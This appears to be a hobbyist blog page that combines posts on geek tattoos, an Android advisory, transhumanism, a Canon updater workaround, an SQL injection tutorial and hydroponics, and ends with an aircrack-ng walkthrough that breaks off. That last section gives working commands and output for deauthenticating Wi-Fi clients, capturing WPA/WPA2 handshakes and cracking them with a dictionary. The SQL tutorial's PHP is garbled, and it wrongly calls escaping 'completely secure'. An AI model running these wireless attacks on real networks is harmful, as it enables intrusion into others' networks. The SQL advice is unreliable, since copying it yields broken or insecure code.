Hacker Blog

Geek Life Tattoo
Represent. This is the tattoo of MC Router. If you are reading this MC Router, we would appreciate a photo of the triforce tattoo.. please?

Virgin Bobba Tattoo
This tattoo can be summed up in one word, epic.
Perhaps you don’t understand the amount of awesome in this tattoo… He has a Virgin Mary-Bobba Fett tattoo with Han flipping Solo as the heart!

Watchmen Love Tattoo
If you don’t recognize the image above, read The Watchmen by Alan Moore. Close your browser, run to the bookstore, and read this graphic novel. The movie isn’t a substitute read it.

Turn Me On Tattoo
Obscure, minimalist, and nerdy… what the best tattoos are made of.

Apple Fanboy Tattoo
The connection between a fanboy and his mac is closer than Steve Job’s turtle neck is around his neck. Some fanboys will even brand themselves with the Apple Logo to “think differently”.

D20 Tattoo
When I think of a D&D roll player, I usually think that they want to conceal that fact. But these geeks are out of the closet (or is that basement?) Lets hope he keeps that muscle build… in a few years that die may loose some air!

Heartris Tattoo
An artist must have loved tetris! There are a lot of tetris tattos, but there is a bit more creative spark behind this one.

Helvetica Tattoo
Want to arouse a typography nerd? Embed the definition of minimalism into your flesh with helvetica. If you ever want a break up send them love notes in papyrus.

Lego Ninja Tattoo
Legos are so f*cking cool!

Parents, do you want your childrens creativity to grow? Stop sending them to piano lessons, they will never use it anyway, and buy em a huge flippin set of legos.

Mario Jedi Tattoo
What is more awesome than Mario? Jedi Mario of course…

Pacman Tattoo
Neat tattoo, not sure if I’d want it on my hand though. It would be pretty sweet to have it wrap around an ancle or something…. since you can go around continuously on the map.

Guitar Hero Tattoo
This tattoo is atrociously awesome. The type of tattoo that makes you feel bad for not thinking of it first. Personally I never got

Pen Tool Tattoo
Illustrator users, behold in envy, the pen tool tattoo.

Super Hero Tattoo
Who cares if wonderwoman starts sagging when I’m 40, I’m getting this on my chest.

Zelda Hearts Tattoo
I am resisting the urge to add the ‘Song of Time’ to every page on this blog as I write this…

Sorry for the downtime folks!

Apparently one of our plugins was causing some troubles.  We bought the plugin “Global Translator Pro” in hopes that we could have translations of our site available to a larger community but, the code is a bit buggy.

Hope to have the translations working again soon as well!

Over the last few years our lives have increasingly become integrated with technology. To many an Android or iPhone is the cornerstone to their life.  For lunch I fire up Google Latitude to see if a friend is nearby to grab a bite, I read my brother’s latest Twitter status as he trains in Florida for the Marines, at Walmart I scan laundry detergent barcodes through ShopSavvy to find a better deal. Only a few decades ago carrying a phone around with you wherever you went would be insane, why would you give everybody access to you at any time? To me, not having the internet with me at all times is equally ludicrous, how would I function!

This is a trade off. There is, of course, a willing breach of privacy but, what about your security. What information could your phone tell me if I hacked it? Are you running banking apps, email accounts, vpn, Facebook, etc.. . breaching the security of a phone is just as serious as hacking a computer.

Early this year oCERT pointed out two large vulnerabilities with Android’s security. Both of which use a denial of service attack to potentially access your phones information.

According to oCERT..

Affected version:

Malformed SMS DoS:

Android all 1.5 CRBxx versions (where xx are digits)
Dalvik API DoS:

Android <= 1.5

Fixed version:

Malformed SMS DoS:
Android 1.5 CBDxx, CRCxx and COCxx (where xx are digits)

Dalvik API DoS:
Android >= Donut DRC79

http://www.ocert.org/advisories/ocert-2009-014.html

In an age in which we rely so heavily on technology we must be vigilant and correct these problems quickly, as technology is double edged.

If you have a pre 1.6 Android phone make sure you get your software upgraded as soon as possible.

Cyberpunk has slowly evolved and muted into Transhumanism.  Shedding the skin of their grungy punk father into a new savvy coat.  The transhumaist community has grown out of the lone basement dwelling “console cowboy” to computer enthusiasts, entrepreneurs, and otaku fanboys.

These culture represents the future.  Their aim may be slightly high, as the Age of Spitual Machines will show, but they will eventually hit their targets.  A machine as intelligent as you and I or transferring your minds “self” through an electronic medium sound like science fiction now, but what technology hasn’t?  If you explained the relativity of space and time to Aristotle he would think you were mad.  This culture beats a path to the future so others can follow.  Gaining cultural acceptance for ideas like genetically modified children or funding artificial general intelligence have very real benefits and we have the transumanists to thank.

We have enjoyed the presence of transhumanism since the birth of cyberpunk.  The highly acclaimed cyberpunk author, William Gibson, wrote in Neuromancer about transhuman-esque individuals, the panther moderns.  They seize upon the latest technologies and integrating electronic components.  Serial Experiment Lain is more transhumanist than cyberpunk.  She realizes that reality is not confined to the world of atoms as we see but, extend to the electronic medium.  The quintessential cyberpunk magazine, 2600, has even made mention.

Transhumaism isn’t so much a new idea but, a refined and elegant version of cyberpunk.

Today I was perusing though some social engineering videos and found a very good one from DefCon 15 that I thought I would share.

The main idea of the talk is to rephrase sentences to lead others to the conclusion you want. These are the same techniques used in hypnosis; literally hacking how the mind works.

You do want to learn about this, don’t you?

(Sorry, there is just text on the video.)

If you liked the talk you can go to the blog of the presenter, Mike Murray.

Today I had a small product photo-shoot and lo and behold, I forgot my CF card.

Canon has this nifty program called Digital Photo Professional through their EOS Utility.  You can take a picture from and save to your computer with it.  Every Canon camera comes with a cd full of great software like this.. but like any true techie I threw away the manufacture disks.

For some reason Canon refuses to give away this software online. Even though the software only works with their cameras and every camera comes with a copy they wont let you download it! Some bigwig CEO must have freaked out when hearing “free” and “online” in the same sentence.

Whats worse is this software is not on any torrent sites or rapidshare.

Well, fortunately for me, there was a work around.

For Mac:

1. Download the latest “Updater” for your program here.
   1. Choose EOS > Digital EOS Camera > Your Model
   2. Navigate to “Drivers and Downloads”
   3. Choose OSX under the “Driver / Software Section”
2. Mount the dmg image file.
3. In the image you should see a file called “UpdateInstaller”  Drag that to you desktop.
4. Control-click the “UpdateInstaller” on your desktop and choose “Show Package Contents” in the menu.
5. In the new window go to Contents > Resources
6. Delete updated.plist - update: it may be called update.plist now
7. Run the software.
8. Enjoy!

Canon, mind getting your act together? Its not like some Nikon user is going to take advantage of the free software you payed good money to develop.  You are a leader in digital photography, so step up to the digital age and distribute the software freely in both material and digital form.

What is an SQL Injection

An SQL injection is an exploit that manipulates the database of a website. It may grab a password you dont want shared or simply rewrite it in the database.

This tutorial will explain how an SQL Injections works and how to avoid this type of attack.

String Injections

Lets imagine a piece of PHP that retrieved the age a member on your forum. To do this the PHP uses a $_GET command to retrieve this data and goes to another page.

The code may look like this

$age = $ _GET [ 'age'];
$requete = mysql_query ( "SELECT age FROM members WHERE age = '$ age'");


This is potentially a nasty piece of code. What on could do is instead of asking for the age one could potentially ask for the password of that user!

String Injections Protection

Its not that difficult to protect yourself from this attack. All it takes is switching out a little code.

Instead of using $_Get replace it with mysql_real_escape_string ()
The code from above changes to


$age = mysql_real_escape_string($_GET['age']);
$requete = mysql_query ( "SELECT age FROM members WHERE age = '$ age'");


Your PHP is now completely secure against this type of attack!

I’ve never before played with hydroponics but, decided to make a hyrdo system without spending a dime.

I had all the items at home and you probably do to.
You will need..

• Jar w/ lid (peanut butter jar is perfect!)
• 2 straws
• Styrofoam Cup (must be styrofoam for buoyancy)
• Tape
• Pin
• Nail
• Hammer
• Exacto Knife
• Plant
• Miracle Grow

From the pictures you should be able to figure it out, but heres the sknny. 
(Hopefully Garbage Bio Magazine will let me write a more complete article on this soon!)

• Take two straws and connect them together.  Take one of the “skrunchy” ends and bend the tip over itself and strap it down with tape.  Take your pin and gouge the end until satisfied.  (I recommend dipping the straw in your jar full of water and seeing how well the water flows in a mirror)
• Grab your paper cup and exacto knife and start making little rectangular slits.   Make sure to put some holes on the bottom, otherwise a majority of te oxygen from your air pump wont get to the plant!
• Now take your lid and put a fairly large hole in the middle.  You can use a hammer and nail or better yet a drill.  Remember that your hole will need to be big enough for your plant to grow into.  Make another hole for your straw to fit into.  To finish it all up poke a few holes around the lid so excess air has a place to go when you feed your little plant oxygen.
• Put it all together!  (use pics below as a reference)
• I used a spider plant bud as they are fairly easy to grow, but have fun and choose something you like.
• Add a little plant food (miracle grow) and your done!

(pin-pricked straw is used as an ultra cheap air pump)

Note: So far I have one complaint with it. I dont like the hole on the top for the plant. Over time the plant will need more space. Ill have to find another solution…

This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons

1. Recovering a hidden ESSID. This is an ESSID which is not being broadcast.
2. Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
3. Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)

Of course, this attack is totally useless if there are no associated wireless client or on a fake authentications.

Usage

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send muliple if you wish); 0 means send them continuously

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

ath0 is the interface name

Usage Examples

Typical Deauthentication

First, you determine a client which is currently connected. You need the MAC address for the following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication

1 is the number of deauths to send (you can send muliple if you wish)

-a 00:14:6C:7E:40:80 is the MAC address of the access point

-c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing

ath0 is the interface name

Here is what the ouput looks like:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0

(switch to another console)

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

(wait for a few seconds)

aircrack-ng -w /path/to/dictionary out.cap

Here the explaination of the above commands:

airodump-ng -c 6 –-bssid 00:14:6C:7E:40:80 -w out ath0

Where:

-c 6 is the channel to listen on

–bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point

-w out is the file prefix of the file name to be written

ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

-0 means deauthentication attack

5 is number of groups of deauthentication packets to send out

-a 00:14:6C:7E:40:80 is MAC address of the access point

-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated

ath0 is the interface name

Here is what the output looks like from “aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0”

12:55:56

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:56

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:57

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:58

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

12:55:58

Sending DeAuth to station

– STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0